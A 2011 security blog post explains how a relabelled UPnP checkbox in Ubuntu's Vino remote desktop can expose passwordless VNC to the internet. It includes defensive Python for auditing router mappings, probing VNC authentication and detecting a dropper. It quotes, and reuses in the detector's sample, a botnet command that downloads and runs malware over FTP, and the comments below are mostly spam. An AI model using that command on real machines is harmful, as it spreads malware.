Saturday, 12 November 2011

Accidentally opening the doors on Ubuntu



This post highlights how even a small change to a graphical user interface can cause unintended security problems.

When Ubuntu's remote desktop service (Vino) first introduced support for UPnP, this is what the Security section of the new configuration dialog looked like:



The UPnP feature was activated by checking "Talk to the router and try to open the doors there". Although this label was criticised for sounding too informal, it did actually give a reasonable impression of what might happen if you checked the box. Namely, it used UPnP to configure the router such that the remote desktop service could be accessed from the internet.

However, this is what the option now looks like in the current Long Term Support version of Ubuntu (10.04.3 LTS, Lucid Lynx):



(This is a screenshot from a real victim of the problem I am about to describe)

Notice that this unfortunate user has enabled remote control of their desktop, with no password protection. What was possibly going through their mind? Well, convenience, most likely. Indeed, the lack of a password may not necessarily pose any security problem if the Ubuntu desktop is on a trusted network and not connected directly to the internet. This would be typical of many home networks, where internet access is usually provided by a NAT-enabled router.

But also notice that the UPnP option is now labelled "Configure network automatically to accept connections". The user has checked this box - after all, why wouldn't you want a connection to be accepted automatically? Convenience is the goal here, and there is nothing to suggest that this option really means "accept connections from the entire internet".

So, after checking the box, the user's UPnP-enabled router will start to accept connections from the internet on port 5900 and forward them to the Ubuntu desktop.  Even so, the settings dialog reassuringly and erroneously states that "Your desktop is only reachable over the local network." The combination of this bug and the slightly unclear option label has caused the user to accidentally open the doors on their Ubuntu desktop. To anyone.
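The router-side half of this failure can be audited rather than guessed at. The following is an added example, not code from this post or from Vino: it walks a UPnP router's port-mapping table using the standard Internet Gateway Device action GetGenericPortMappingEntry (service WANIPConnection:1) and flags any entry that forwards internet TCP traffic to a VNC display port on a LAN host. The control URL is an assumed placeholder (a real one is listed in the router's device description XML advertised over SSDP), and the sample SOAP reply and fault are constructed, not captured from a real router.

```python
"""Audit a UPnP router's port-mapping table for entries that expose VNC.

Added example for this post, not Vino's or Ubuntu's code. Mappings are read
by index with GetGenericPortMappingEntry until the router answers with a
SOAP fault (UPnP error 713, SpecifiedArrayIndexInvalid), which ends the table.
"""
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
# ASSUMED placeholder: take the real control URL from the router's device
# description document (the LOCATION header of its SSDP reply).
ROUTER_CONTROL_URL = "http://192.168.1.1:49152/upnp/control/WANIPConn1"
VNC_PORTS = range(5900, 5910)   # RFB displays :0 to :9; vino-server defaults to 5900


def build_soap(action: str, args: Dict[str, object]) -> Tuple[bytes, Dict[str, str]]:
    """Return (body, headers) for one UPnP SOAP action call."""
    arg_xml = "".join("<%s>%s</%s>" % (k, v, k) for k, v in args.items())
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="%s" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        '<s:Body><u:%s xmlns:u="%s">%s</u:%s></s:Body></s:Envelope>'
    ) % (SOAP_NS, action, SERVICE, arg_xml, action)
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": '"%s#%s"' % (SERVICE, action)}
    return body.encode(), headers


def parse_mapping(xml_text: str) -> Optional[Dict[str, object]]:
    """Parse a GetGenericPortMappingEntryResponse; None for a SOAP fault (end of table)."""
    root = ET.fromstring(xml_text)
    if root.find(".//{%s}Fault" % SOAP_NS) is not None:
        return None
    resp = root.find(".//{%s}GetGenericPortMappingEntryResponse" % SERVICE)
    if resp is None:
        return None

    def text(tag: str) -> str:
        return (resp.findtext(tag) or "").strip()

    return {
        "external_port": int(text("NewExternalPort")),
        "protocol": text("NewProtocol").upper(),
        "internal_client": text("NewInternalClient"),
        "internal_port": int(text("NewInternalPort")),
        "enabled": text("NewEnabled") == "1",
        "description": text("NewPortMappingDescription"),
    }


def exposes_vnc(mapping: Dict[str, object]) -> bool:
    """True when the mapping forwards internet TCP traffic to a VNC display port."""
    return bool(mapping["enabled"]) and mapping["protocol"] == "TCP" and mapping["internal_port"] in VNC_PORTS


def report(mappings: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Keep only the mappings that expose a VNC port."""
    return [m for m in mappings if exposes_vnc(m)]


def enumerate_mappings(control_url: str, limit: int = 256) -> List[Dict[str, object]]:
    """Walk the router's mapping table (network call, not exercised offline)."""
    mappings = []
    for index in range(limit):
        body, headers = build_soap("GetGenericPortMappingEntry", {"NewPortMappingIndex": index})
        req = urllib.request.Request(control_url, data=body, headers=headers, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=5) as r:
                reply = r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:      # IGDs return HTTP 500 carrying the SOAP fault
            reply = e.read().decode("utf-8", "replace")
        m = parse_mapping(reply)
        if m is None:
            break
        mappings.append(m)
    return mappings


# Constructed sample replies, not captured from a real router.
SAMPLE_ENTRY = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:GetGenericPortMappingEntryResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
    '<NewRemoteHost></NewRemoteHost><NewExternalPort>5900</NewExternalPort><NewProtocol>TCP</NewProtocol>'
    '<NewInternalPort>5900</NewInternalPort><NewInternalClient>192.168.1.23</NewInternalClient>'
    '<NewEnabled>1</NewEnabled><NewPortMappingDescription>Remote Desktop</NewPortMappingDescription>'
    '<NewLeaseDuration>0</NewLeaseDuration></u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>'
)
SAMPLE_FAULT = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault>'
    '<faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail>'
    '<UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>713</errorCode>'
    '<errorDescription>SpecifiedArrayIndexInvalid</errorDescription></UPnPError>'
    '</detail></s:Fault></s:Body></s:Envelope>'
)

if __name__ == "__main__":
    for m in report(enumerate_mappings(ROUTER_CONTROL_URL)):
        print("EXPOSED: internet TCP %d -> %s:%d (%s)" % (
            m["external_port"], m["internal_client"], m["internal_port"], m["description"]))
```

Run it from a machine on the LAN side of the router. Most routers also show the same table in their web interface under "port forwarding" or "UPnP", and an entry pointing at the desktop's port 5900 is exactly what a checked "Configure network automatically to accept connections" box produces.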

Anybody in the world can now use this person's computer simply by using a VNC client to connect to the public-facing IP address of the router (no password required, of course).
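A self-check for this exposed-and-passwordless state, as an added example that is not from the post or from vino-server: it performs only the first two steps of the RFB handshake (the protocol VNC clients speak, RFC 6143) against a server you own, reads the list of security types the server offers, and reports OPEN when type 1 ("None") is among them, meaning anyone who can reach the port gets the desktop without a password. The banner and security-type bytes used to exercise the parsing functions are constructed.

```python
"""Does a VNC server offer a connection with no authentication at all?

Added example for this post, not vino-server's code. Only the RFB version
exchange and the security-type list are read; the probe never proceeds to
a desktop session.
"""
import socket
from typing import Dict, List, Tuple

# Security-type numbers registered for RFB 3.7+ (RFC 6143 section 7.1.2 and IANA).
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication", 5: "RA2",
                  16: "Tight", 18: "TLS", 19: "VeNCrypt"}


def parse_version(banner: bytes) -> Tuple[int, int]:
    """The server greets with exactly 12 bytes, e.g. b'RFB 003.008\\n'."""
    if len(banner) != 12 or not banner.startswith(b"RFB ") or not banner.endswith(b"\n"):
        raise ValueError("not an RFB banner: %r" % banner)
    major, minor = banner[4:11].split(b".")
    return int(major), int(minor)


def parse_security_types(msg: bytes) -> List[int]:
    """RFB 3.7+: one count byte, then that many security-type bytes.

    A count of 0 means the server refused the connection; a big-endian
    length-prefixed reason string follows and is raised as the error text.
    """
    if not msg:
        raise ValueError("empty security-types message")
    count = msg[0]
    if count == 0:
        reason_len = int.from_bytes(msg[1:5], "big")
        raise ConnectionRefusedError(msg[5:5 + reason_len].decode("latin-1"))
    if len(msg) < 1 + count:
        raise ValueError("truncated security-types message")
    return list(msg[1:1 + count])


def verdict(types: List[int]) -> str:
    """OPEN if type 1 (None) is offered at the top level.

    Types 18/19 (TLS/VeNCrypt) run a second negotiation inside TLS which may
    itself select 'None'; this probe stops at the outer list, so NEGOTIATED
    means 'not provably open', not 'protected'.
    """
    return "OPEN" if 1 in types else "NEGOTIATED"


def interpret(banner: bytes, msg: bytes) -> Dict[str, object]:
    """Pure function over the two server messages; used by probe() and testable offline."""
    major, minor = parse_version(banner)
    if (major, minor) < (3, 7):
        raise NotImplementedError("RFB 3.3 sends a single 4-byte security type instead of a list")
    types = parse_security_types(msg)
    return {"version": "%d.%d" % (major, minor),
            "types": [SECURITY_TYPES.get(t, str(t)) for t in types],
            "verdict": verdict(types)}


def probe(host: str, port: int = 5900, timeout: float = 5.0) -> Dict[str, object]:
    """Live check of a server you control (network call, not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(12)
        parse_version(banner)
        s.sendall(banner)          # echo the server's version: a client must not offer a higher one
        msg = s.recv(256)
    return interpret(banner, msg)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print(probe(target))
```

Run `probe()` against the router's public address from outside the LAN to confirm exposure, and against the desktop's own address from inside it to confirm the password half. A result of NEGOTIATED with only TLS or VeNCrypt on offer is not proof that a password is set, because the real choice is made inside a TLS session this probe does not enter.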

Internet-facing VNC servers are often subjected to automated attacks from botnets, but vino-server's lack of connection logging might make these hard to trace after the event. Thankfully, most of the automated attacks happening right now are only designed to exploit Windows systems.  You may, for example, notice attacks similar to the following, which launch a command prompt and create a temporary FTP script named "ik", which is then used to download and execute malware:
cmd /c echo open example.com 21 >> ik &echo user xyz letmein >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
echo You got owned

The botnet simply connects to an exposed VNC server and sends these characters to the remote Windows computer.  Quite cheeky, but at least it has the decency to tell the user they got owned!
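One way to spot this dropper after the fact, as an added example that is not from the post's author: since vino-server does not log connections, the remaining artefacts are the commands themselves, which can surface in a process-creation audit log, an endpoint agent's command-line trail or a captured keystroke stream. The scanner below matches the structure of the one-liner quoted above (an FTP script assembled with `echo ... >> FILE`, run with `ftp -s:FILE`, then a downloaded name invoked later in the chain) rather than the literal host or file names, so it is not tied to example.com or "ik". The sample log is constructed: its first line is the post's own attack string, the other two are benign scripted-FTP jobs that must not fire.

```python
"""Flag command lines that build and run an FTP download script in one go.

Added example for this post. Input is any text containing one command line
per line (audit log, keystroke capture, shell history); output is a list of
Finding objects describing each suspicious chain.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# The three stages of the chain, matched separately so the file name ties them together.
FTP_RUN = re.compile(r"\bftp\b[^&|\n]*?-s:(?P<file>[^\s&|]+)", re.I)
ECHO_OPEN = re.compile(r"\becho\s+open\s+(?P<host>[^\s&|>]+)(?:\s+\d+)?\s*>>\s*(?P<file>[^\s&|]+)", re.I)
ECHO_GET = re.compile(r"\becho\s+m?get\s+(?P<name>[^\s&|>]+)\s*>>\s*(?P<file>[^\s&|]+)", re.I)


@dataclass
class Finding:
    line_no: int
    script_file: str            # the FTP script that 'ftp -s:' executes
    ftp_host: Optional[str]     # server named in 'echo open ...', if seen
    downloaded: List[str]       # names fetched with 'echo get ...'
    executed: List[str]         # downloaded names invoked after the ftp call

    @property
    def severity(self) -> str:
        # A downloaded name that is then run is the complete download-and-execute chain.
        return "high" if self.executed else "medium"


def analyse_line(line: str, line_no: int) -> Optional[Finding]:
    """Return a Finding when the line builds an FTP script inline and runs it."""
    run = FTP_RUN.search(line)
    if run is None:
        return None
    script = run.group("file").lower()
    hosts = [m.group("host") for m in ECHO_OPEN.finditer(line) if m.group("file").lower() == script]
    gets = [m.group("name") for m in ECHO_GET.finditer(line) if m.group("file").lower() == script]
    if not hosts and not gets:
        return None     # scripted ftp with a pre-existing script file: normal in batch jobs
    tail = line[run.end():]     # everything after the ftp invocation
    executed = [g for g in gets
                if re.search(r"(?:^|[&|;]\s*)" + re.escape(g) + r"(?=\s|$|&)", tail, re.I)]
    return Finding(line_no, run.group("file"), hosts[0] if hosts else None, gets, executed)


def scan(text: str) -> List[Finding]:
    """Scan every line of a log or capture and collect findings."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        f = analyse_line(line, n)
        if f is not None:
            findings.append(f)
    return findings


# Constructed sample: line 1 is the attack string quoted in the post, lines 2-3 are benign.
SAMPLE_LOG = """cmd /c echo open example.com 21 >> ik &echo user xyz letmein >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
ftp -n -v -s:C:\\jobs\\nightly.ftp
echo backup complete >> C:\\jobs\\log.txt
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("line %d [%s]: host=%s script=%s downloaded=%s executed=%s" % (
            f.line_no, f.severity, f.ftp_host, f.script_file, f.downloaded, f.executed))
```

Keying on the script file name shared between the `echo` stages and the `ftp -s:` call keeps the rule quiet on ordinary scheduled FTP jobs, which run a script that already exists on disk rather than assembling one in the same command line.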

Are you affected by this? If you have enabled remote desktop or vino-server on any version of Ubuntu or Windows, you should probably double-check that you haven't inadvertently exposed the service to the entire internet. If you do wish the service to be internet-visible, ensure that you use a suitably strong password and keep your server software up to date.

34 comments:

  1. That's why, if you fall into this category, you'll need someone to keep an eye on your kids wherever they are. The person you choose to take care of your children should be trustworthy and honest. security services in London We've heard of cases where caretakers liaise with kidnappers to abduct children. You don't want to fall victim to such a racket. UK Close Protection Services are specialists in child protection. When you hire us, we'll provide you with armed and unarmed bodyguards to protect your family against any harm or kidnap.

  2. I’ve been busy writing my reports. Now, I don’t do it anymore thanks to this service. Go to their homepage. The majority of students are overwhelmed with homework. If you are one of them, click here 야동 .

  3. "Can I simply just say what a relief to find a person that genuinely understands what they are talking about on the internet.
    You definitely know how to bring an issue to light and make it important.
    A lot more people ought to check this out and understand
    this side of your story. It's surprising you are not more popular because you definitely have the gift."

    오피

  4. It’s remarkable to go to see this web site and reading the views of all mates about this paragraph, while I am also eager of getting know-how.

    마사지

  5. I’m impressed, I must say. I’m here for the first time. Superb! I simply must tell you that I really love your blogs page. My boyfriend enjoys your blogs.
    건전마사지

  6. Great post happy to see this. I thought this was a pretty interesting read when it comes to this topic Information. Thanks..
    Artificial Intelligence Course

  7. Nice Post thank you very much for sharing such a useful information and will definitely saved and revisit your site and i have bookmarked to check out new things frm your post.
    Data Science Course

  8. Thanks Your post is so cool and this is an extraordinary moving article and If it's not too much trouble share more like that.
    Digital Marketing Course in Hyderabad

  9. Very great post which I really enjoy reading this and it is not everyday that I have the possibility to see something like this. Thank You.
    Best Online Data Science Courses

  10. Actually I read it yesterday but I had some ideas about it and today I wanted to read it again because it is so well written.
    Data Scientist Course in Jaipur

  11. Very good message. I stumbled across your blog and wanted to say that I really enjoyed reading your articles. Anyway, I will subscribe to your feed and hope you post again soon.
    Data Scientist Course in India

  12. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work thank you.
    Cloud Computing Training in Bangalore

  13. This comment has been removed by the author.

  14. Excellently written article, if only all bloggers offered the same level of content as you, the internet would be a much better place. keep up the good work.
    Mlops Training

  15. Thanks for such a great post and the review, I am totally impressed! Keep stuff like this coming.
    Mlops Course

  16. This is definitely one of my favorite blogs. Every post published did impress me.
    Mlops Training

  17. Very informative Blog! There is so much information here that can help thank you for sharing.
    Data Science Training in Lucknow

  18. 스포츠토토티비
    스포츠중계

    This is a lovely post. I really appreciate your optimism and I agree with your post and looking forward for more post from you..

  19. I think this is a really good article. You make this information interesting and engaging. Thanks for sharing.
    Data Science Training in Jalandhar

  20. Really nice and interesting post. I was looking for this kind of information and enjoyed reading this one. Thanks for sharing.
    Data Science Training in Indore

  21. I think this is a really good article. You make this information interesting and engaging. Thanks for sharing.
    Data Science Course in India

  22. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work thank you.
    Business Analytics Course in Chandigarh

  23. Give the privilege of being a member until it makes people who are interested are widespread and come to apply for membership on the web without interruption. Don't hesitate to apply for membership today. Million dollar slots are waiting for you. Ak88king

  24. Hit on a Soft 17 - A lot of players make this mistake because the general rule is to Stand on Hard 17. However, on a Soft 17, the Ace makes all of the difference. When you 우리계열 imagine that your whole will beat the dealer's whole. "Change please" - This is a method of asking the dealer to transform your cash into taking part in chips.

  25. Rely on the Best Local SEO services in India by Divine Soft Technology and get stay on the top of the search results. Ours is an SEO company in Delhi that works to get you prominence online.

  26. Thanks for bringing alert to readers especially ubuntu users. Small changes will make much difference coding related OS such as Ubuntu. It's really nice to bring this beautiful article for us. Thanks for sharing and keep sharing more related blogs. Traffic Lawyer Alleghany Virginia

  27. Thanks for sharing this wonderful blog. Best CRM Software for Marketing in 2023

  28. I always looking for a blog that is related to my problem and then I found this. Fence Company Spring Hill, FL

  29. are you the same guy who wrote IRC Hacks? it's my favourite book for bedtime reading <3
